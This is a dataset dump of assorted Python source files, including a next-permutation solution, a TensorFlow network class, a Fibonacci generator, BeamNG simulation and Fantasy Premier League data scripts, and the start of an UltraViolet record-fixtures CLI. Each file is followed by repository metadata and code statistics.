# 从右向左循环 n - 1到 i区间的数组元素
j = n - 1
while j >= i:
# 找到在此区间内比 i - 1位置的数值大的元素,开始进行换位操作
if nums[j] > nums[i - 1]:
# 移位交换操作
self.exchangeVal(nums, i - 1, j)
# 将 n - 1到 i区间的元素调整为升序,即为最小的数值排列
self.reverseArr(nums, i, n - 1)
return
j -= 1
i -= 1
# 如果是降序数组,则反转数组,称为最小数值的排列
self.reverseArr(nums, 0, n - 1)
def exchangeVal(self, arr, left, right):
arr[left], arr[right] = arr[right], arr[left]
def reverseArr(self, arr, begin, end):
while begin < end:
self.exchangeVal(arr, begin, end)
begin += 1
end -= 1
if __name__ == '__main__':
points = [1, 2, 3]
ins = Solution()
ins.nextPermutation(points)
print(points)
| 22.125
| 61
| 0.468927
| 199
| 1,593
| 3.713568
| 0.371859
| 0.040595
| 0.028417
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054507
| 0.40113
| 1,593
| 71
| 62
| 22.43662
| 0.720126
| 0.310107
| 0
| 0
| 0
| 0
| 0.007533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0
| 0
| 0.206897
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b53df049332ea39e2f7827214e41edfb7e42ca6c
| 7,885
|
py
|
Python
|
feed_forward_model.py
|
karlschrader/deepPD
|
678793c9026eab2681d2d0a3b7e7f9f91c0f3bc5
|
[
"MIT"
] | null | null | null |
feed_forward_model.py
|
karlschrader/deepPD
|
678793c9026eab2681d2d0a3b7e7f9f91c0f3bc5
|
[
"MIT"
] | null | null | null |
feed_forward_model.py
|
karlschrader/deepPD
|
678793c9026eab2681d2d0a3b7e7f9f91c0f3bc5
|
[
"MIT"
] | null | null | null |
import os
from datetime import datetime
import numpy as np
import tensorflow as tf
from tensorflow.python.training import moving_averages
TF_DTYPE = tf.float64
MOMENTUM = 0.99
EPSILON = 1e-6
DELTA_CLIP = 50.0
class FeedForwardModel():
"""
Abstract class for creating neural networks.
Offers functions to build or clone individual layers of complete networks
"""
def __init__(self, bsde, run_name):
self._bsde = bsde
# ops for statistics update of batch normalization
self._extra_train_ops = []
self.tb_dir = tf.app.flags.FLAGS.tensorboard_dir + run_name + "_" + datetime.now(
).strftime('%Y_%m_%d_%H_%M_%S')
os.mkdir(self.tb_dir)
def _clone_subnetwork(self, input_, timestep, layer_count, weights):
"""
Clone a neural network, using the same weights as the source networks.
Args:
input_ (Tensor): Input of the neural network that will be build
timestep (float): Time index, used for tensor names
layer_count (int): number of layers in the neural network that should be cloned
weights (np.array(size=[num_timesteps, layer_count]))
Returns:
Tensor: Output of the last layer of the neural network
"""
with tf.variable_scope(str(timestep)):
hiddens = self._batch_norm(input_, name='path_input_norm')
for i in range(1, layer_count - 1):
hiddens = self._copy_batch_layer(hiddens, 'layer_{}'.format(i),
i, timestep, weights)
output = self._copy_batch_layer(hiddens, 'final_layer',
layer_count - 1, timestep, weights)
return output
def _subnetwork(self, input_, timestep, num_hiddens):
"""
Generate a neural network
Args:
input_ (Tensor): Input of the neural network that will be build
timestep (float): Time index, used for tensor name
num_hiddens (np.array(size=[layer_count])): Specifies the number
of additional dimensions for each layer of the neural network.
Returns:
Tensor: Output of the last layer of the neural network
"""
matrix_weights = []
with tf.variable_scope(str(timestep)):
# input norm
hiddens = self._batch_norm(input_, name='path_input_norm')
for i in range(1, len(num_hiddens) - 1):
hiddens, weight = self._dense_batch_layer(
hiddens,
num_hiddens[i] + self._bsde.dim,
activation_fn=tf.nn.relu,
layer_name='layer_{}'.format(i),
)
matrix_weights.append(weight)
# last layer without relu
output, weight = self._dense_batch_layer(
hiddens,
num_hiddens[-1] + self._bsde.dim,
activation_fn=None,
layer_name='final_layer',
)
matrix_weights.append(weight)
return output, matrix_weights
def _dense_batch_layer(self,
input_,
output_size,
activation_fn=None,
stddev=5.0,
layer_name="linear"):
"""
Generate one fully connected layer
Args:
input_ (Tensor): Input of layer
output_size (int): Number of outputs this layer should have
KwArgs:
activation_fn (Function): activation function for the neurons in
this layer. Will usually be ReLU, but can be left blank for the last layer.
stddev (float): stddev to use for the initial distribution of weights in this layer
layer_name (string): tensorflow name used for the variables in this layer
Returns:
Tensor: Output of the layer
tf.Variable: Reference to the used Matrix weight
"""
with tf.variable_scope(layer_name):
shape = input_.get_shape().as_list()
weight = tf.get_variable(
'Matrix', [shape[1], output_size],
TF_DTYPE,
tf.random_normal_initializer(
stddev=stddev / np.sqrt(shape[1] + output_size)))
# matrix weight
hiddens = tf.matmul(input_, weight)
#batch norm
hiddens_bn = self._batch_norm(hiddens)
if activation_fn:
return activation_fn(hiddens_bn), weight
return hiddens_bn, weight
def _copy_batch_layer(self, input_, layer_name, layer, timestep, weights):
"""
Copy one fully connected layer, reusing the weights of the previous layer
Args:
input_ (Tensor): Input of layer
layer_name (string): tensorflow name used for the variables in this layer
layer (int): index of the layer in the current timestep
timestep (int): index of the current timestep
weights (np.array(size=[num_timesteps, layer_count])): weight database to copy from
Returns:
Tensor: Output of the layer
"""
with tf.variable_scope(layer_name):
# init matrix weight with matrix weights from primal stage
weight = tf.Variable(weights[timestep - 1][layer - 1], 'Matrix')
hiddens = tf.matmul(input_, weight)
hiddens_bn = self._batch_norm(hiddens)
return hiddens_bn
def _batch_norm(self, input_, name='batch_norm'):
"""
Batch normalize the data
Args:
input_ (Tensor): Input of layer
KwArgs:
name (string): Used as tensorflow name
Returns:
Tensor: Output of the layer
See https://arxiv.org/pdf/1502.03167v3.pdf p.3
"""
with tf.variable_scope(name):
params_shape = [input_.get_shape()[-1]]
beta = tf.get_variable(
'beta',
params_shape,
TF_DTYPE,
initializer=tf.random_normal_initializer(
0.0, stddev=0.1, dtype=TF_DTYPE))
gamma = tf.get_variable(
'gamma',
params_shape,
TF_DTYPE,
initializer=tf.random_uniform_initializer(
0.1, 0.5, dtype=TF_DTYPE))
moving_mean = tf.get_variable(
'moving_mean',
params_shape,
TF_DTYPE,
initializer=tf.constant_initializer(0.0, TF_DTYPE),
trainable=False)
moving_variance = tf.get_variable(
'moving_variance',
params_shape,
TF_DTYPE,
initializer=tf.constant_initializer(1.0, TF_DTYPE),
trainable=False)
# These ops will only be performed when training
mean, variance = tf.nn.moments(input_, [0], name='moments')
self._extra_train_ops.append(
moving_averages.assign_moving_average(moving_mean, mean,
MOMENTUM))
self._extra_train_ops.append(
moving_averages.assign_moving_average(moving_variance,
variance, MOMENTUM))
mean, variance = tf.cond(self._is_training,
lambda: (mean, variance),
lambda: (moving_mean, moving_variance))
hiddens_bn = tf.nn.batch_normalization(input_, mean, variance,
beta, gamma, EPSILON)
hiddens_bn.set_shape(input_.get_shape())
return hiddens_bn
| 38.842365
| 95
| 0.557261
| 872
| 7,885
| 4.824541
| 0.231651
| 0.01545
| 0.022819
| 0.02377
| 0.365581
| 0.314476
| 0.246019
| 0.214405
| 0.151652
| 0.151652
| 0
| 0.009419
| 0.367153
| 7,885
| 202
| 96
| 39.034653
| 0.833667
| 0.29423
| 0
| 0.281818
| 0
| 0
| 0.030564
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054545
| false
| 0
| 0.045455
| 0
| 0.163636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b540b40d9aaf331bef2f785083b2bbd7ed30bfe6
| 619
|
py
|
Python
|
Fibonacci/Python/fibonacci.py
|
IanDoarn/LearningRepo
|
4c5906b3c1f497a979c3fce89a66d1e571cd6b42
|
[
"MIT"
] | null | null | null |
Fibonacci/Python/fibonacci.py
|
IanDoarn/LearningRepo
|
4c5906b3c1f497a979c3fce89a66d1e571cd6b42
|
[
"MIT"
] | null | null | null |
Fibonacci/Python/fibonacci.py
|
IanDoarn/LearningRepo
|
4c5906b3c1f497a979c3fce89a66d1e571cd6b42
|
[
"MIT"
] | null | null | null |
"""
Fibonacci sequence using python
generators
Written by: Ian Doarn
"""
def fib():
# Generator that yields fibonacci numbers
a, b = 0, 1
while True: # First iteration:
yield a # yield 0 to start with and then
a, b = b, a + b # a will now be 1, and b will also be 1, (0 + 1)
if __name__ == '__main__':
# Maximum fib numbers to print
max_i = 20
for i, fib_n in enumerate(fib()):
#Print each yielded fib number
print('{i:3}: {f:3}'.format(i=i, f=fib_n))
# Break when we hit max_i value
if i == max_i:
break
| 23.807692
| 75
| 0.55412
| 97
| 619
| 3.402062
| 0.57732
| 0.018182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027094
| 0.344103
| 619
| 25
| 76
| 24.76
| 0.785714
| 0.466882
| 0
| 0
| 0
| 0
| 0.063291
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b543f58cf6e8b8dc209086801165057172e20d3f
| 1,711
|
py
|
Python
|
scripts/test_spider_roundtrip.py
|
mattr1/seq2struct_forPRs
|
cdc9e3c94380fb479ed3e3c77f370038d27cf2d6
|
[
"MIT"
] | 25
|
2019-07-16T22:32:44.000Z
|
2022-01-25T05:23:07.000Z
|
scripts/test_spider_roundtrip.py
|
mattr1/seq2struct_forPRs
|
cdc9e3c94380fb479ed3e3c77f370038d27cf2d6
|
[
"MIT"
] | 19
|
2018-12-17T20:42:11.000Z
|
2020-02-12T21:29:51.000Z
|
scripts/test_spider_roundtrip.py
|
mattr1/seq2struct_forPRs
|
cdc9e3c94380fb479ed3e3c77f370038d27cf2d6
|
[
"MIT"
] | 22
|
2019-03-16T05:57:27.000Z
|
2020-10-25T04:34:54.000Z
|
import ast
import argparse
import json
import os
import pprint
import astor
import tqdm
import _jsonnet
from seq2struct import datasets
from seq2struct import grammars
from seq2struct.utils import registry
from third_party.spider import evaluation
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--config', required=True)
parser.add_argument('--config-args')
parser.add_argument('--output', required=True)
args = parser.parse_args()
if args.config_args:
config = json.loads(_jsonnet.evaluate_file(args.config, tla_codes={'args': args.config_args}))
else:
config = json.loads(_jsonnet.evaluate_file(args.config))
os.makedirs(args.output, exist_ok=True)
gold = open(os.path.join(args.output, 'gold.txt'), 'w')
predicted = open(os.path.join(args.output, 'predicted.txt'), 'w')
train_data = registry.construct('dataset', config['data']['train'])
grammar = registry.construct('grammar', config['model']['decoder_preproc']['grammar'])
evaluator = evaluation.Evaluator(
'data/spider-20190205/database',
evaluation.build_foreign_key_map_from_json('data/spider-20190205/tables.json'),
'match')
for i, item in enumerate(tqdm.tqdm(train_data, dynamic_ncols=True)):
parsed = grammar.parse(item.code, 'train')
sql = grammar.unparse(parsed, item)
evaluator.evaluate_one(
item.schema.db_id,
item.orig['query'].replace('\t', ' '),
sql)
gold.write('{}\t{}\n'.format(item.orig['query'].replace('\t', ' '), item.schema.db_id))
predicted.write('{}\n'.format(sql))
if __name__ == '__main__':
main()
| 30.553571
| 102
| 0.663939
| 211
| 1,711
| 5.222749
| 0.417062
| 0.045372
| 0.046279
| 0.041742
| 0.161525
| 0.123412
| 0.079855
| 0.079855
| 0
| 0
| 0
| 0.013709
| 0.189947
| 1,711
| 55
| 103
| 31.109091
| 0.781385
| 0
| 0
| 0
| 0
| 0
| 0.124489
| 0.035652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.285714
| 0
| 0.309524
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5473421d6c0b8e5ed5978ee678700c80296d6a9
| 1,340
|
py
|
Python
|
utils/model_helper.py
|
CocoBir/django-restful-demo
|
aeb7f8a0bcff5c52b528c7b0c48f87de5f392320
|
[
"MIT"
] | null | null | null |
utils/model_helper.py
|
CocoBir/django-restful-demo
|
aeb7f8a0bcff5c52b528c7b0c48f87de5f392320
|
[
"MIT"
] | null | null | null |
utils/model_helper.py
|
CocoBir/django-restful-demo
|
aeb7f8a0bcff5c52b528c7b0c48f87de5f392320
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
model helper
~~~~~~~~~~~~
:Created: 2016-8-5
:Copyright: (c) 2016<smileboywtu@gmail.com>
"""
from customer_exceptions import OffsetOutOfRangeException
class ListModelHelper(object):
"""get the object list"""
@classmethod
def list(cls, index=0, limit=8, sort=None, order='asc'):
"""get the list of the model object
:param condition: filter condition
:param index: page index
:param limit: page entry number
:param sort: sort condition
:param order: asc or desc
:return: object list
"""
if not sort:
sort = 'id'
order_by = '-' + sort if order != 'asc' else sort
offset = index * limit
# check the offset
total = cls.objects.count()
if offset > total: raise OffsetOutOfRangeException()
return {
'total': total,
'datalist': cls.objects.order_by(order_by)\
[offset:offset + limit]
}
class ViewModelHelper(object):
"""get a single instance"""
@classmethod
def view(cls, pk):
"""
get a specific objects
:param pk: primary key
:return:
"""
return cls.objects.get(id=pk)
class GenericModelHelper(ListModelHelper, ViewModelHelper):
pass
| 23.103448
| 60
| 0.568657
| 144
| 1,340
| 5.263889
| 0.465278
| 0.031662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014161
| 0.314925
| 1,340
| 57
| 61
| 23.508772
| 0.811547
| 0.319403
| 0
| 0.095238
| 0
| 0
| 0.028424
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0.047619
| 0.047619
| 0
| 0.380952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5484bee48cb34153d413c1639f3e4d36037235a
| 2,323
|
py
|
Python
|
tests/test_filters/test_edges.py
|
luluricketts/biothings_explorer
|
ae2009ff285f96a08e0145f242846ca613b5069c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_filters/test_edges.py
|
luluricketts/biothings_explorer
|
ae2009ff285f96a08e0145f242846ca613b5069c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_filters/test_edges.py
|
luluricketts/biothings_explorer
|
ae2009ff285f96a08e0145f242846ca613b5069c
|
[
"Apache-2.0"
] | null | null | null |
"""
Tests for edges.py
"""
import unittest
import pandas as pd
from biothings_explorer.user_query_dispatcher import SingleEdgeQueryDispatcher
from biothings_explorer.filters.edges import filter_node_degree
class TestFilterEdges(unittest.TestCase):
# test for count values
def test_count_values(self):
counts = [10, 20, 40, 50, 100]
seqd = SingleEdgeQueryDispatcher(input_cls='Gene',
output_cls='ChemicalSubstance',
input_id='NCBIGene',
values='1017')
seqd.query()
for count in counts:
newG = filter_node_degree(seqd.G, count)
self.assertEqual(len(newG.nodes), count+1)
# edge case test if count > num nodes, then returns num_nodes results
def test_num_nodes(self):
count = 1000
seqd = SingleEdgeQueryDispatcher(input_cls='Gene',
output_cls='ChemicalSubstance',
input_id='NCBIGene',
values='1017')
seqd.query()
newG = filter_node_degree(seqd.G, count)
self.assertEqual(len(newG.nodes), len(seqd.G.nodes))
# test for correct ordering of ranks
def test_ranks(self):
seqd = SingleEdgeQueryDispatcher(input_cls='Disease',
input_id='MONDO',
output_cls='PhenotypicFeature',
pred='related_to',
values='MONDO:0010997')
seqd.query()
newG = filter_node_degree(seqd.G)
for i1,node1 in enumerate(newG.nodes):
if node1 == 'MONDO:MONDO:0010997':
continue
for i2,node2 in enumerate(newG.nodes):
if node2 == 'MONDO:MONDO:0010997':
continue
if newG.degree(node1) > newG.degree(node2):
self.assertLess(newG.nodes.data()[node1]['rank'], newG.nodes.data()[node2]['rank'])
elif newG.degree(node1) < newG.degree(node2):
self.assertGreater(newG.nodes.data()[node1]['rank'], newG.nodes.data()[node2]['rank'])
if __name__ == '__main__':
unittest.main()
| 40.754386
| 106
| 0.54025
| 233
| 2,323
| 5.23176
| 0.351931
| 0.059065
| 0.052502
| 0.091058
| 0.45119
| 0.415094
| 0.415094
| 0.359311
| 0.331419
| 0.331419
| 0
| 0.039624
| 0.359019
| 2,323
| 56
| 107
| 41.482143
| 0.779046
| 0.061989
| 0
| 0.340909
| 0
| 0
| 0.082988
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.068182
| false
| 0
| 0.090909
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b54ed986a0849287fd62118ba89a87ae8732ba9e
| 974
|
py
|
Python
|
get_data.py
|
ryanw3bb/fpl
|
a06fbf8ada5f549f0750ed9af46f53b3a1a0149e
|
[
"MIT"
] | 1
|
2018-08-15T02:52:52.000Z
|
2018-08-15T02:52:52.000Z
|
get_data.py
|
ryanw3bb/fpl
|
a06fbf8ada5f549f0750ed9af46f53b3a1a0149e
|
[
"MIT"
] | null | null | null |
get_data.py
|
ryanw3bb/fpl
|
a06fbf8ada5f549f0750ed9af46f53b3a1a0149e
|
[
"MIT"
] | null | null | null |
"""
Retrieves data as json files from fantasy.premierleague.com
"""
import json
import requests
LAST_SEASON_DATA_FILENAME = "data/player_data_20_21.json"
DATA_URL = "https://fantasy.premierleague.com/api/bootstrap-static/"
DATA_FILENAME = "data/player_data_21_22.json"
FIXTURES_URL = "https://fantasy.premierleague.com/api/fixtures/"
FIXTURES_FILENAME = "data/fixtures_data_21_22.json"
# Download all player data and write file
def get_player_data(use_last_season):
if use_last_season:
return LAST_SEASON_DATA_FILENAME
r = requests.get(DATA_URL)
json_response = r.json()
with open(DATA_FILENAME, 'w') as out_file:
json.dump(json_response, out_file)
return DATA_FILENAME
# Download all fixtures data and write file
def get_fixtures_data():
r = requests.get(FIXTURES_URL)
json_response = r.json()
with open(FIXTURES_FILENAME, 'w') as out_file:
json.dump(json_response, out_file)
return FIXTURES_FILENAME
| 24.974359
| 68
| 0.74846
| 142
| 974
| 4.84507
| 0.288732
| 0.087209
| 0.100291
| 0.063953
| 0.468023
| 0.392442
| 0.229651
| 0.148256
| 0.148256
| 0.148256
| 0
| 0.014634
| 0.158111
| 974
| 38
| 69
| 25.631579
| 0.82439
| 0.145791
| 0
| 0.190476
| 0
| 0
| 0.227218
| 0.100851
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.095238
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b54f720607fa63d495bc79cd36045e62028217a1
| 5,587
|
py
|
Python
|
examples/spawning5.py
|
MissMeriel/BeamNGpy
|
a8467c57537441802bc5b56f0012dfee2b5f5af0
|
[
"MIT"
] | 1
|
2021-08-10T19:29:52.000Z
|
2021-08-10T19:29:52.000Z
|
examples/spawning5.py
|
MissMeriel/BeamNGpy
|
a8467c57537441802bc5b56f0012dfee2b5f5af0
|
[
"MIT"
] | null | null | null |
examples/spawning5.py
|
MissMeriel/BeamNGpy
|
a8467c57537441802bc5b56f0012dfee2b5f5af0
|
[
"MIT"
] | null | null | null |
from beamngpy import BeamNGpy, Vehicle, Scenario, ScenarioObject
from beamngpy import setup_logging, Config
from beamngpy.sensors import Camera, GForces, Lidar, Electrics, Damage, Timer
import beamngpy
import time, random
# globals
default_model = 'pickup'
default_scenario = 'west_coast_usa' #'cliff' # smallgrid
dt = 20
def spawn_point(scenario_locale):
if scenario_locale is 'cliff':
#return {'pos':(-124.806, 142.554, 465.489), 'rot':None, 'rot_quat':(0, 0, 0.3826834, 0.9238795)}
return {'pos': (-124.806, 190.554, 465.489), 'rot': None, 'rot_quat': (0, 0, 0.3826834, 0.9238795)}
elif scenario_locale is 'west_coast_usa':
#return {'pos':(-717.121, 101, 118.675), 'rot':None, 'rot_quat':(0, 0, 0.3826834, 0.9238795)}
return {'pos': (-717.121, 101, 118.675), 'rot': None, 'rot_quat': (0, 0, 0.918812, -0.394696)}
#906, 118.78 rot:
elif scenario_locale is 'smallgrid':
return {'pos':(0.0, 0.0, 0.0), 'rot':None, 'rot_quat':(0, 0, 0.3826834, 0.9238795)}
def setup_sensors(vehicle):
# Set up sensors
pos = (-0.3, 1, 1.0)
direction = (0, 1, 0)
fov = 120
resolution = (512, 512)
front_camera = Camera(pos, direction, fov, resolution,
colour=True, depth=True, annotation=True)
pos = (0.0, 3, 1.0)
direction = (0, -1, 0)
fov = 90
resolution = (512, 512)
back_camera = Camera(pos, direction, fov, resolution,
colour=True, depth=True, annotation=True)
gforces = GForces()
electrics = Electrics()
damage = Damage()
damage.encode_vehicle_request()
lidar = Lidar(visualized=False)
timer = Timer()
# Attach them
vehicle.attach_sensor('front_cam', front_camera)
vehicle.attach_sensor('back_cam', back_camera)
vehicle.attach_sensor('gforces', gforces)
vehicle.attach_sensor('electrics', electrics)
vehicle.attach_sensor('damage', damage)
vehicle.attach_sensor('timer', timer)
return vehicle
def compare_damage(d1, d2):
for key in d1['damage']:
if d1['damage'][key] != d2['damage'][key]:
print("d1['damage'][{}] == {}; d2['damage'][{}] == {}".format(key, d1['damage'][key], key, d2['damage'][key]))
try:
# handle specific keys
if key == 'deform_group_damage' or key == 'part_damage':
for k in d1['damage'][key].keys():
print("\td1['damage'][{}][{}] == {}; d2['damage'][{}][{}] == {}".format(key, k, d1['damage'][key][k], key, k,
d2['damage'][key][k]))
else:
if d1['damage'][key] < d2['damage'][key]:
print("\td2[damage][{}] is greater".format(key))
else:
print("\td1[damage][{}] is greater".format(key))
except:
continue
print()
return
def backup(cum_list, sec):
#return "1_24"
dt = sec * 5.0
index = len(cum_list) - int(dt)
if index < 0:
index = 0
elif index >= len(cum_list):
index = len(cum_list) -1
print("cum_list={}".format(cum_list))
print("index={}".format(index))
#try:
return cum_list[index]
#except:
#return "0_0"
def main():
global default_model, default_scenario
beamng = BeamNGpy('localhost', 64256, home='C:/Users/merie/Documents/BeamNG.research.v1.7.0.1')
#scenario = Scenario('smallgrid', 'spawn_objects_example')
scenario = Scenario(default_scenario, 'research_test', description='Random driving for research')
vehicle = Vehicle('ego_vehicle', model=default_model, licence='PYTHON')
vehicle = setup_sensors(vehicle)
spawn = spawn_point(default_scenario)
scenario.add_vehicle(vehicle, pos=spawn['pos'], rot=spawn['rot'], rot_quat=spawn['rot_quat'])
scenario.make(beamng)
bng = beamng.open()
bng.load_scenario(scenario)
bng.start_scenario()
vehicle.update_vehicle()
d1 = bng.poll_sensors(vehicle)
cum_list = []
bound = 0.0
for i in range(3):
for _ in range(45):
bound = bound + 0.0 # 0.1
# vehicle.save()
vehicle.update_vehicle()
d2 = bng.poll_sensors(vehicle)
throttle = 1.0
#throttle = random.uniform(0.0, 1.0)
steering = random.uniform(-1 * bound, bound)
brake = 0.0 #random.choice([0, 0, 0, 1])
vehicle.control(throttle=throttle, steering=steering, brake=brake)
pointName = "{}_{}".format(i, _)
cum_list.append(pointName)
vehicle.saveRecoveryPoint(pointName)
bng.step(20)
print("SEGMENT #{}: COMPARE DAMAGE".format(i))
damage_diff = compare_damage(d1, d2)
d1 = d2
# "Back up" 1 second -- load vehicle at that time in that position.
backup_pointName = backup(cum_list, 0.001)
print('recovering to {}'.format(pointName))
loadfile = vehicle.loadRecoveryPoint(backup_pointName)
print('loadfile is {}'.format(loadfile))
bng.pause()
vehicle.update_vehicle()
vehicle.load(loadfile)
#vehicle.load("vehicles/pickup/vehicle.save.json")
bng.resume()
#vehicle.startRecovering()
#time.sleep(1.5)
#vehicle.stopRecovering()
vehicle.update_vehicle()
bng.pause()
time.sleep(2)
# vehicle.load("vehicles/pickup/vehicle.save.json")
bng.resume()
bng.close()
if __name__ == "__main__":
main()
| 36.51634
| 133
| 0.583139
| 685
| 5,587
| 4.632117
| 0.264234
| 0.015128
| 0.0104
| 0.022061
| 0.211787
| 0.173338
| 0.173338
| 0.162622
| 0.144343
| 0.113457
| 0
| 0.067558
| 0.263469
| 5,587
| 153
| 134
| 36.51634
| 0.703524
| 0.121711
| 0
| 0.12069
| 0
| 0
| 0.122466
| 0.01454
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043103
| false
| 0
| 0.043103
| 0
| 0.137931
| 0.086207
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5526b9490a6617e9343309ab67db978943793e5
| 1,070
|
py
|
Python
|
SmallTips/RemoveDuplication.py
|
Akasan/PythonTips
|
eee85c35fd25576c7b2b01af838749608bf8989c
|
[
"MIT"
] | null | null | null |
SmallTips/RemoveDuplication.py
|
Akasan/PythonTips
|
eee85c35fd25576c7b2b01af838749608bf8989c
|
[
"MIT"
] | null | null | null |
SmallTips/RemoveDuplication.py
|
Akasan/PythonTips
|
eee85c35fd25576c7b2b01af838749608bf8989c
|
[
"MIT"
] | null | null | null |
import pickle
def remove_duplicate_from_list(data):
""" remove duplications from specific list
any data can be contained in the data.
if the data is hashable, you can implement this function easily like below.
data = list(set(data))
but if the data is unhashable, you have to implement in other ways.
This function use pickle.dumps to convert any data to binary.
Binary data is hashable, so after that, we can implement like with hashable data.
Arguments:
data {list(any)} -- list that contains any type of data
Returns:
{list(any)} -- list that contains any type of data without duplications
"""
pickled_data = [pickle.dumps(d) for d in data]
removed_pickled_data = list(set(pickled_data))
result = [pickle.loads(d) for d in removed_pickled_data]
return result
if __name__ == "__main__":
data = [1, 2, 2, 3, 2, 2, 2, 6]
print(remove_duplicate_from_list(data))
data = ["hoge", 1, "hdf", 3.4, "hoge", 2, 2, 2]
print(remove_duplicate_from_list(data))
| 36.896552
| 89
| 0.66729
| 161
| 1,070
| 4.291925
| 0.403727
| 0.014472
| 0.082489
| 0.099855
| 0.23589
| 0.196816
| 0.104197
| 0.104197
| 0.104197
| 0
| 0
| 0.017305
| 0.243925
| 1,070
| 28
| 90
| 38.214286
| 0.836836
| 0.534579
| 0
| 0.181818
| 0
| 0
| 0.042601
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.272727
| 0.181818
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5533e6640dc60d29a04f82e1a7722aa55036807
| 7,226
|
py
|
Python
|
ultraviolet_cli/commands/fixtures.py
|
mnyrop/ultraviolet-cli
|
f177adde71a899ca6775bd4673d30e19ccdb2a30
|
[
"MIT"
] | 1
|
2022-02-08T18:28:30.000Z
|
2022-02-08T18:28:30.000Z
|
ultraviolet_cli/commands/fixtures.py
|
mnyrop/ultraviolet-cli
|
f177adde71a899ca6775bd4673d30e19ccdb2a30
|
[
"MIT"
] | null | null | null |
ultraviolet_cli/commands/fixtures.py
|
mnyrop/ultraviolet-cli
|
f177adde71a899ca6775bd4673d30e19ccdb2a30
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2022 NYU Libraries.
#
# ultraviolet-cli is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio module for custom UltraViolet commands."""
import click
import glob
import json
import os
import requests
import sys
from jsonschema import Draft4Validator
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from .. import config, utils
# Suppress InsecureRequestWarning warnings from urllib3.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def create_record_draft(metadata, api, token):
sleep(1)
try:
r = requests.get(api, timeout=5, verify=False)
r.raise_for_status()
except requests.exceptions.RequestException as e:
print(f'Couldn\'t connect to api at {api}. Is the application running?')
raise SystemExit(e)
headers = {
'content-type': 'application/json',
'authorization': f'Bearer {token}'
}
response = requests.post(url=api,
data=json.dumps(metadata),
headers=headers,
verify=False)
response.raise_for_status()
return response.json()
def delete_record_draft(pid, api, token):
sleep(1)
